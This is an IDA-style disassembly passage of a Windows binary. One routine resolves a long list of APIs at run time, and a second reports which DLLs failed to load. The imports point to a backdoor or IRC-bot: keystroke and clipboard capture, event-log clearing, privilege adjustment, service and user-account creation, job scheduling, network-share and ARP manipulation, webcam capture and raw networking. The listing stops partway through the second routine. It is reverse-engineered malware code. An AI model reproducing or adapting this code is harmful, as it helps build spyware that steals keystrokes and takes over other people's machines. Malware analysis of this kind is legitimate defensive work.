mov dword_4E422C, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_4E41C0, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_4E42D0, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_4E41F0, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_4E4210, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_4E4274, eax
call esi ; GetProcAddress
cmp dword_4E427C, ebx
mov dword_4E4160, eax
jz short loc_409FFA
cmp dword_4E422C, ebx
jz short loc_409FFA
cmp dword_4E41C0, ebx
jz short loc_409FFA
cmp dword_4E42D0, ebx
jz short loc_409FFA
cmp dword_4E41F0, ebx
jz short loc_409FFA
cmp dword_4E4210, ebx
jz short loc_409FFA
cmp dword_4E4274, ebx
jz short loc_409FFA
cmp eax, ebx
jnz short loc_40A004
loc_409FFA: ; CODE XREF: sub_409E0C+1B8�j
; sub_409E0C+1C0�j ...
mov dword_4E42E8, 1
loc_40A004: ; CODE XREF: sub_409E0C+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; GetProcAddress
push offset aGetkeystate ; "GetKeyState"
push edi
mov dword_4E41EC, eax
call esi ; GetProcAddress
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov dword_4E40F4, eax
call esi ; GetProcAddress
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov dword_4E41BC, eax
call esi ; GetProcAddress
cmp dword_4E41EC, ebx
mov dword_4E41A4, eax
jz short loc_40A061
cmp dword_4E40F4, ebx
jz short loc_40A061
cmp dword_4E41BC, ebx
jz short loc_40A061
cmp eax, ebx
jnz short loc_40A06B
jmp short loc_40A061
; ---------------------------------------------------------------------------
loc_40A056: ; CODE XREF: sub_409E0C+144�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov dword_4E42EC, eax
loc_40A061: ; CODE XREF: sub_409E0C+232�j
; sub_409E0C+23A�j ...
mov dword_4E42E8, 1
loc_40A06B: ; CODE XREF: sub_409E0C+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_40A224
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_4E4290, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_4E41D4, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_4E4244, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_4E4120, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_4E4184, eax
call esi ; GetProcAddress
push offset aOpeneventloga ; "OpenEventLogA"
push edi
mov dword_4E41FC, eax
call esi ; GetProcAddress
push offset aCleareventloga ; "ClearEventLogA"
push edi
mov dword_4E41A0, eax
call esi ; GetProcAddress
cmp dword_4E4290, ebx
mov dword_4E41B0, eax
jz short loc_40A114
cmp dword_4E41D4, ebx
jz short loc_40A114
cmp dword_4E4244, ebx
jz short loc_40A114
cmp dword_4E4120, ebx
jz short loc_40A114
cmp dword_4E4184, ebx
jz short loc_40A114
cmp dword_4E41FC, ebx
jnz short loc_40A11E
loc_40A114: ; CODE XREF: sub_409E0C+2DE�j
; sub_409E0C+2E6�j ...
mov dword_4E42F0, 1
loc_40A11E: ; CODE XREF: sub_409E0C+306�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_4E4204, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_4E41DC, eax
call esi ; GetProcAddress
cmp dword_4E4204, ebx
mov dword_4E428C, eax
jz short loc_40A159
cmp dword_4E41DC, ebx
jz short loc_40A159
cmp eax, ebx
jnz short loc_40A163
loc_40A159: ; CODE XREF: sub_409E0C+33F�j
; sub_409E0C+347�j
mov dword_4E42F0, 1
loc_40A163: ; CODE XREF: sub_409E0C+34B�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_4E4214, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_4E40FC, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_4E4104, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_4E4168, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_4E416C, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_4E4118, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_4E41E0, eax
call esi ; GetProcAddress
cmp dword_4E4214, ebx
mov dword_4E4108, eax
jz short loc_40A207
cmp dword_4E40FC, ebx
jz short loc_40A207
cmp dword_4E4104, ebx
jz short loc_40A207
cmp dword_4E4168, ebx
jz short loc_40A207
cmp dword_4E416C, ebx
jz short loc_40A207
cmp dword_4E4118, ebx
jz short loc_40A207
cmp dword_4E41E0, ebx
jz short loc_40A207
cmp eax, ebx
jnz short loc_40A211
loc_40A207: ; CODE XREF: sub_409E0C+3C5�j
; sub_409E0C+3CD�j ...
mov dword_4E42F0, 1
loc_40A211: ; CODE XREF: sub_409E0C+3F9�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_4E4100, eax
jnz short loc_40A239
jmp short loc_40A22F
; ---------------------------------------------------------------------------
loc_40A224: ; CODE XREF: sub_409E0C+26A�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov dword_4E42F4, eax
loc_40A22F: ; CODE XREF: sub_409E0C+416�j
mov dword_4E42F0, 1
loc_40A239: ; CODE XREF: sub_409E0C+414�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_40A305
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_4E420C, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_4E4264, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_4E426C, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_4E4228, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_4E4144, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_4E40F0, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_4E4268, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_4E40DC, eax
call esi ; GetProcAddress
cmp dword_4E420C, ebx
mov dword_4E417C, eax
jz short loc_40A310
cmp dword_4E4264, ebx
jz short loc_40A310
cmp dword_4E426C, ebx
jz short loc_40A310
cmp dword_4E4228, ebx
jz short loc_40A310
cmp dword_4E4144, ebx
jz short loc_40A310
cmp dword_4E40F0, ebx
jz short loc_40A310
cmp dword_4E4268, ebx
jz short loc_40A310
cmp dword_4E40DC, ebx
jz short loc_40A310
cmp eax, ebx
jnz short loc_40A31A
jmp short loc_40A310
; ---------------------------------------------------------------------------
loc_40A305: ; CODE XREF: sub_409E0C+438�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov dword_4E42FC, eax
loc_40A310: ; CODE XREF: sub_409E0C+4B9�j
; sub_409E0C+4C1�j ...
mov dword_4E42F8, 1
loc_40A31A: ; CODE XREF: sub_409E0C+4F5�j
mov ebp, ds:dword_4F63C0
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A5D6
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_4E4190, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_4E42C4, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_4E4130, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_4E410C, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_4E41CC, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_4E41B4, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_4E4178, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_4E42A0, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_4E42BC, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_4E41C8, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_4E42AC, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_4E4260, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_4E4220, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_4E421C, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_4E4150, eax
call esi ; GetProcAddress
push offset aSend_1 ; "send"
push edi
mov dword_4E4148, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_4E4270, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_4E4284, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_4E4238, eax
call esi ; GetProcAddress
mov dword_4E41F8, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_4E424C, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_4E4208, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_4E4248, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_4E42B4, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_4E4200, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_4E41C4, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_4E4234, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_4E42A4, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_4E41D8, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_4E4174, eax
call esi ; GetProcAddress
cmp dword_4E4190, ebx
mov dword_4E42B8, eax
jz loc_40A5E1
cmp dword_4E42C4, ebx
jz loc_40A5E1
cmp dword_4E4130, ebx
jz loc_40A5E1
cmp dword_4E41CC, ebx
jz loc_40A5E1
cmp dword_4E41B4, ebx
jz loc_40A5E1
cmp dword_4E4178, ebx
jz loc_40A5E1
cmp dword_4E42A0, ebx
jz loc_40A5E1
cmp dword_4E42BC, ebx
jz loc_40A5E1
cmp dword_4E41C8, ebx
jz loc_40A5E1
cmp dword_4E42AC, ebx
jz loc_40A5E1
cmp dword_4E4260, ebx
jz loc_40A5E1
cmp dword_4E4220, ebx
jz loc_40A5E1
cmp dword_4E421C, ebx
jz loc_40A5E1
cmp dword_4E4150, ebx
jz short loc_40A5E1
cmp dword_4E4270, ebx
jz short loc_40A5E1
cmp dword_4E4284, ebx
jz short loc_40A5E1
cmp dword_4E4238, ebx
jz short loc_40A5E1
cmp dword_4E41F8, ebx
jz short loc_40A5E1
cmp dword_4E424C, ebx
jz short loc_40A5E1
cmp dword_4E4208, ebx
jz short loc_40A5E1
cmp dword_4E4248, ebx
jz short loc_40A5E1
cmp dword_4E42B4, ebx
jz short loc_40A5E1
cmp dword_4E4200, ebx
jz short loc_40A5E1
cmp dword_4E41C4, ebx
jz short loc_40A5E1
cmp dword_4E4234, ebx
jz short loc_40A5E1
cmp dword_4E42A4, ebx
jz short loc_40A5E1
cmp dword_4E41D8, ebx
jz short loc_40A5E1
cmp eax, ebx
jnz short loc_40A5EB
jmp short loc_40A5E1
; ---------------------------------------------------------------------------
loc_40A5D6: ; CODE XREF: sub_409E0C+51F�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov dword_4E4304, eax
loc_40A5E1: ; CODE XREF: sub_409E0C+6BE�j
; sub_409E0C+6CA�j ...
mov dword_4E4300, 1
loc_40A5EB: ; CODE XREF: sub_409E0C+7C6�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A6F0
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_4E415C, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_4E40E4, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_4E41E8, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_4E4194, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_4E41F4, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_4E41B8, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_4E4124, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_4E411C, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_4E412C, eax
call esi ; GetProcAddress
cmp dword_4E415C, ebx
mov ecx, dword_4E41B8
mov dword_4E4254, eax
jz short loc_40A6CC
cmp dword_4E40E4, ebx
jz short loc_40A6CC
cmp dword_4E41E8, ebx
jz short loc_40A6CC
cmp dword_4E4194, ebx
jz short loc_40A6CC
cmp dword_4E41F4, ebx
jz short loc_40A6CC
cmp ecx, ebx
jz short loc_40A6CC
cmp dword_4E4124, ebx
jz short loc_40A6CC
cmp dword_4E411C, ebx
jz short loc_40A6CC
cmp dword_4E412C, ebx
jz short loc_40A6CC
cmp eax, ebx
jnz short loc_40A6D6
loc_40A6CC: ; CODE XREF: sub_409E0C+87E�j
; sub_409E0C+886�j ...
mov dword_4E4308, 1
loc_40A6D6: ; CODE XREF: sub_409E0C+8BE�j
cmp ecx, ebx
jz short loc_40A70B
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_4E41D0, eax
jnz short loc_40A70B
jmp short loc_40A705
; ---------------------------------------------------------------------------
loc_40A6F0: ; CODE XREF: sub_409E0C+7EA�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov dword_4E430C, eax
mov dword_4E4308, 1
loc_40A705: ; CODE XREF: sub_409E0C+8E2�j
mov dword_4E41D0, ebx
loc_40A70B: ; CODE XREF: sub_409E0C+8CC�j
; sub_409E0C+8E0�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A755
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_4E41A8, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_4E42D8, eax
call esi ; GetProcAddress
cmp dword_4E41A8, ebx
mov dword_4E4138, eax
jz short loc_40A760
cmp dword_4E42D8, ebx
jz short loc_40A760
cmp eax, ebx
jnz short loc_40A76A
jmp short loc_40A760
; ---------------------------------------------------------------------------
loc_40A755: ; CODE XREF: sub_409E0C+90A�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov dword_4E4314, eax
loc_40A760: ; CODE XREF: sub_409E0C+939�j
; sub_409E0C+941�j ...
mov dword_4E4310, 1
loc_40A76A: ; CODE XREF: sub_409E0C+945�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A871
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_4E4114, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_4E40EC, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_4E4164, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_4E4198, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_4E42B0, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_4E414C, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_4E40F8, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_4E40E8, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_4E4180, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_4E4278, eax
call esi ; GetProcAddress
push offset aNetwkstagetinf ; "NetWkstaGetInfo"
push edi
mov dword_4E4230, eax
call esi ; GetProcAddress
cmp dword_4E4114, ebx
mov dword_4E4154, eax
jz short loc_40A87C
cmp dword_4E40EC, ebx
jz short loc_40A87C
cmp dword_4E4164, ebx
jz short loc_40A87C
cmp dword_4E4198, ebx
jz short loc_40A87C
cmp dword_4E42B0, ebx
jz short loc_40A87C
cmp dword_4E414C, ebx
jz short loc_40A87C
cmp dword_4E40F8, ebx
jz short loc_40A87C
cmp dword_4E40E8, ebx
jz short loc_40A87C
cmp dword_4E4180, ebx
jz short loc_40A87C
cmp dword_4E4278, ebx
jz short loc_40A87C
cmp dword_4E4230, ebx
jnz short loc_40A886
jmp short loc_40A87C
; ---------------------------------------------------------------------------
loc_40A871: ; CODE XREF: sub_409E0C+969�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov dword_4E431C, eax
loc_40A87C: ; CODE XREF: sub_409E0C+A11�j
; sub_409E0C+A19�j ...
mov dword_4E4318, 1
loc_40A886: ; CODE XREF: sub_409E0C+A61�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A8BB
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_4E413C, eax
call esi ; GetProcAddress
cmp dword_4E413C, ebx
mov dword_4E4218, eax
jz short loc_40A8C6
cmp eax, ebx
jnz short loc_40A8D0
jmp short loc_40A8C6
; ---------------------------------------------------------------------------
loc_40A8BB: ; CODE XREF: sub_409E0C+A85�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov dword_4E4324, eax
loc_40A8C6: ; CODE XREF: sub_409E0C+AA7�j
; sub_409E0C+AAD�j
mov dword_4E4320, 1
loc_40A8D0: ; CODE XREF: sub_409E0C+AAB�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A905
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_4E429C, eax
call esi ; GetProcAddress
cmp dword_4E429C, ebx
mov dword_4E4298, eax
jz short loc_40A910
cmp eax, ebx
jnz short loc_40A91A
jmp short loc_40A910
; ---------------------------------------------------------------------------
loc_40A905: ; CODE XREF: sub_409E0C+ACF�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov dword_4E432C, eax
loc_40A910: ; CODE XREF: sub_409E0C+AF1�j
; sub_409E0C+AF7�j
mov dword_4E4328, 1
loc_40A91A: ; CODE XREF: sub_409E0C+AF5�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A979
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_4E42C8, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_4E42C0, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_4E4288, eax
call esi ; GetProcAddress
cmp dword_4E42C8, ebx
mov dword_4E4158, eax
jz short loc_40A984
cmp dword_4E42C0, ebx
jz short loc_40A984
cmp dword_4E4288, ebx
jz short loc_40A984
cmp eax, ebx
jnz short loc_40A98E
jmp short loc_40A984
; ---------------------------------------------------------------------------
loc_40A979: ; CODE XREF: sub_409E0C+B19�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov dword_4E4334, eax
loc_40A984: ; CODE XREF: sub_409E0C+B55�j
; sub_409E0C+B5D�j ...
mov dword_4E4330, 1
loc_40A98E: ; CODE XREF: sub_409E0C+B69�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A9C3
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_4E418C, eax
call esi ; GetProcAddress
cmp dword_4E418C, ebx
mov dword_4E4294, eax
jz short loc_40A9CE
cmp eax, ebx
jnz short loc_40A9D8
jmp short loc_40A9CE
; ---------------------------------------------------------------------------
loc_40A9C3: ; CODE XREF: sub_409E0C+B8D�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov dword_4E433C, eax
loc_40A9CE: ; CODE XREF: sub_409E0C+BAF�j
; sub_409E0C+BB5�j
mov dword_4E4338, 1
loc_40A9D8: ; CODE XREF: sub_409E0C+BB3�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40AA61
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_4E425C, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_4E42A8, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_4E41E4, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_4E419C, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_4E423C, eax
call esi ; GetProcAddress
cmp dword_4E425C, ebx
mov dword_4E41AC, eax
jz short loc_40AA6C
cmp dword_4E42A8, ebx
jz short loc_40AA6C
cmp dword_4E41E4, ebx
jz short loc_40AA6C
cmp dword_4E419C, ebx
jz short loc_40AA6C
cmp dword_4E423C, ebx
jz short loc_40AA6C
cmp eax, ebx
jnz short loc_40AA76
jmp short loc_40AA6C
; ---------------------------------------------------------------------------
loc_40AA61: ; CODE XREF: sub_409E0C+BD7�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov dword_4E4344, eax
loc_40AA6C: ; CODE XREF: sub_409E0C+C2D�j
; sub_409E0C+C35�j ...
mov dword_4E4340, 1
loc_40AA76: ; CODE XREF: sub_409E0C+C51�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40AAAB
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; GetProcAddress
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov dword_4E4170, eax
call esi ; GetProcAddress
cmp dword_4E4170, ebx
mov dword_4E4250, eax
jz short loc_40AAB6
cmp eax, ebx
jnz short loc_40AAC0
jmp short loc_40AAB6
; ---------------------------------------------------------------------------
loc_40AAAB: ; CODE XREF: sub_409E0C+C75�j
call ds:dword_4F6394 ; RtlGetLastWin32Error
mov dword_4E434C, eax
loc_40AAB6: ; CODE XREF: sub_409E0C+C97�j
; sub_409E0C+C9D�j
mov dword_4E4348, 1
loc_40AAC0: ; CODE XREF: sub_409E0C+C9B�j
push 1
pop eax
pop edi
pop esi
pop ebp
pop ebx
retn
sub_409E0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40AAC8(int,char *Str,int,int)
sub_40AAC8 proc near ; CODE XREF: sub_401CC7+252B�p
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+Str]
push esi
xor esi, esi
cmp dword_4E42E0, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_40AB10
push dword_4E42E4
lea eax, [ebp+Dest]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
loc_40AB10: ; CODE XREF: sub_40AAC8+1A�j
cmp dword_4E42E8, esi
jz short loc_40AB44
push dword_4E42EC
lea eax, [ebp+Dest]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
loc_40AB44: ; CODE XREF: sub_40AAC8+4E�j
cmp dword_4E42F0, esi
jz short loc_40AB78
push dword_4E42F4
lea eax, [ebp+Dest]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
loc_40AB78: ; CODE XREF: sub_40AAC8+82�j
cmp dword_4E42F8, esi
jz short loc_40ABAC
push dword_4E42FC
lea eax, [ebp+Dest]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
loc_40ABAC: ; CODE XREF: sub_40AAC8+B6�j
cmp dword_4E4300, esi
jz short loc_40ABE0
push dword_4E4304
lea eax, [ebp+Dest]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
loc_40ABE0: ; CODE XREF: sub_40AAC8+EA�j
cmp dword_4E4308, esi
jz short loc_40AC14
push dword_4E430C
lea eax, [ebp+Dest]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
loc_40AC14: ; CODE XREF: sub_40AAC8+11E�j
cmp dword_4E4310, esi
jz short loc_40AC48
push dword_4E4314
lea eax, [ebp+Dest]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
loc_40AC48: ; CODE XREF: sub_40AAC8+152�j
cmp dword_4E4318, esi
jz short loc_40AC7C
push dword_4E431C
lea eax, [ebp+Dest]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
loc_40AC7C: ; CODE XREF: sub_40AAC8+186�j
cmp dword_4E4320, esi
jz short loc_40ACB0
push dword_4E4324
lea eax, [ebp+Dest]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
loc_40ACB0: ; CODE XREF: sub_40AAC8+1BA�j
cmp dword_4E4328, esi
jz short loc_40ACE4
push dword_4E432C
lea eax, [ebp+Dest]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push edi ; int
push eax ; int
push ebx ; Str
